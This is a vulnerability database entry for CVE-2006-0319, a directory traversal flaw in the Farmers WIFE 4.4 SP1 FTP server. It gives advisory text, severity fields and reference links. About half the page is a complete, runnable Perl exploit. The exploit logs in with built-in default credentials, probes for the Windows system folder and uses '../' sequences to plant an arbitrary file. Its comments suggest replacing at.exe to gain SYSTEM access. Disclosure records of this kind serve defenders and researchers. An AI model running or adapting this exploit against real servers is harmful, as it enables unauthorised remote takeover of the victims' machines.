CVE-2006-0319
CVSS 5.0
Published: 2006-01-18 20:03:00
Last revised: 2016-10-17 23:38:50

[Original] Directory traversal vulnerability in the FTP server (port 22003/tcp) in Farmers WIFE 4.4 SP1 allows remote attackers to create arbitrary files via ".." (dot dot) sequences in a (1) PUT, (2) SIZE, and possibly other commands.


[CNNVD] Farmers WIFE FTP Server Directory Traversal Vulnerability (CNNVD-200601-212)

        A directory traversal vulnerability exists in the FTP server (port 22003/tcp) of Farmers WIFE 4.4 SP1. It allows remote attackers to create arbitrary files via ".." (dot dot) sequences in (1) PUT, (2) SIZE, and possibly other commands.

- CVSS (Base Score)

CVSS score: 5 [MEDIUM]
Confidentiality impact: [--]
Integrity impact: [--]
Availability impact: [--]
Attack complexity: [--]
Attack vector: [--]
Authentication: [--]

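- CPE (Affected Platforms and Products)

Product and version information (CPE) is not yet available

- OVAL (Technical Details for Detection)

No related OVAL definitions found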

- Official Database Links

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-0319
(Official data source) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2006-0319
(Official data source) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200601-212
(Official data source) CNNVD

- Other Links and Resources

http://marc.info/?l=full-disclosure&m=113717162320654&w=2
(UNKNOWN)  FULLDISC  20060113 Farmers wife 4.4 sp1 remote SYSTEM access
http://www.lort.dk/DSR-farmerswife44sp1.pl
(UNKNOWN)  MISC  http://www.lort.dk/DSR-farmerswife44sp1.pl
http://www.securityfocus.com/bid/16321
(UNKNOWN)  BID  16321
http://xforce.iss.net/xforce/xfdb/24190
(UNKNOWN)  XF  farmerswife-ftp-directory-traversal(24190)

- Vulnerability Information

Farmers WIFE FTP Server Directory Traversal Vulnerability
Medium severity  Path traversal
2006-01-18 00:00:00 2006-01-20 00:00:00
Remote

- Advisories and Patches

        

- Vulnerability Information (1417)

Farmers WIFE 4.4 sp1 (FTP) Remote System Access Exploit (EDBID:1417)
windows remote
2006-01-14 Verified
22003 kokanin
N/A
#!/usr/bin/perl
# kokanin 20060106 // farmers wife server 4.4 sp1 allows us to 
# use ../../../ patterns as long as we stand in a folder where we have write access.
# haha, that's what you get for implementing your own access control instead of relying on the underlying OS.
# default port is 22003, default writable path is /guests.

# 0day 0day, private, distribute and die bla bla bla
# leet (translated) note from <anonymized>: you can log in as IEUser/mail@mail.com or anonymous/mail@mail.com
# on _all_ farmers wife servers. This can't be disabled unless you turn off FTP access. The anonymous
# login gives you guest access, which means write access to /guests, which means default remote 'root'
# aka SYSTEM access. Ha ha ha, thanks anonymized, I missed that bit.


if(!$ARGV[0]){ die "Usage: ./thisscript.pl <ip> [user] [pass] [port] [path] [trojan.exe] [/path/to/target.exe] \n";}
# as in: ./thisscript.pl 123.45.67.89 demo demo 22003 /writablepath /etc/hosts /owned.txt
# by default we just put /etc/hosts in a file called owned.txt in the root of the drive - 
# nuke %SYSTEMROOT%\system32\at.exe and wait for windows to run it.

# We can check for the %SYSTEMROOT% with the SIZE command to determine the proper
# location for our trojan.

use Net::FTP;
my $target = $ARGV[0];
my $dotdot = "../../../../../../../../../../../../../../";
# Here we set defaults (It's ugly, I know) that gives REMOTE REWT OMGOMG I MEAN SYSTEM
if($ARGV[1]){ $user = $ARGV[1] } else { $user = "IEUser";}
if($ARGV[2]){ $pass = $ARGV[2] } else { $pass = "mail\@mail.com";}
if($ARGV[3]){ $port = $ARGV[3] } else { $port = "22003";}
if($ARGV[4]){ $writablepath = $ARGV[4] } else { $writablepath = "/guests";}
if($ARGV[5]){ $trojan = $ARGV[5] } else { $trojan = "/etc/hosts";}
if($ARGV[6]){ $destination = $ARGV[6] } else { $destination = "owned.txt";}
print " target: $target \n user: $user \n pass: $pass \n port: $port \n writable path: $writablepath \n trojan: $trojan \n targetfile: $destination \n";

# Open the command socket
use Net::FTP;
$ftp = Net::FTP->new("$target",
                      Debug => 0,
                      Port => "$port")
	or die "Cannot connect: $@";
	$ftp->login("$user","$pass")
	or die "Cannot login ", $ftp->message;
	$ftp->cwd("$writablepath")
	# this software is so shitty, it allows us to CWD to any folder and just pukes later if it's not there.
	or die "Cannot go to writable dir ", $ftp->message;
	# leet %SYSTEMROOT% scan by determining where at.exe is using SIZE
	my @systemroots = ("PUNIX","WINXP","WINNT","WIN2000","WIN2K","WINDOWS","WINDOZE");
	for(@systemroots){
		$reply = $ftp->quot("SIZE " . $dotdot . $_ . "/system32/at.exe");
		if($reply == 2) { print " %SYSTEMROOT% is /$_\n";my $systemroot=$_; }
		}
	$ftp->binary;
	$ftp->put("$trojan","$dotdot"."$destination")
	and print "file successfully uploaded, donate money to kokanin\@gmail.com\n" or die "Something messed up, file upload failed ", $ftp->message;
$ftp->quit;

# milw0rm.com [2006-01-14]
		

- Vulnerability Information

22496
Farmers WIFE FTP Server Multiple Command Traversal Arbitrary File Creation
Input Manipulation
Exploit Public

- Vulnerability Description

- Timeline

2006-01-06 Unknown
2006-01-06 Unknown

- Solution

Products

Unknown or Incomplete

- Related References

- Vulnerability Author

Unknown or Incomplete
 

 
